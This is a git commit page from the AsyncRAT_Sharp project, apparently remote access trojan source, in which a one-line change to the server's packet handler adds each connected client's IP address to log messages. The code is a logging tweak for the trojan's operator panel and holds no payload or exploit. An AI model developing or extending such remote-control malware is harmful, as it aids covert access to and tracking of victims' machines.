Incudle client's ip in the log

This commit is contained in:
NYAN CAT 2019-05-23 03:51:47 +03:00
parent a503e7d450
commit 9f81994017

View File

@ -38,7 +38,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
case "Logs": case "Logs":
{ {
new HandleLogs().Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black); new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} {unpack_msgpack.ForcePathObject("Message").AsString}", Color.Black);
break; break;
} }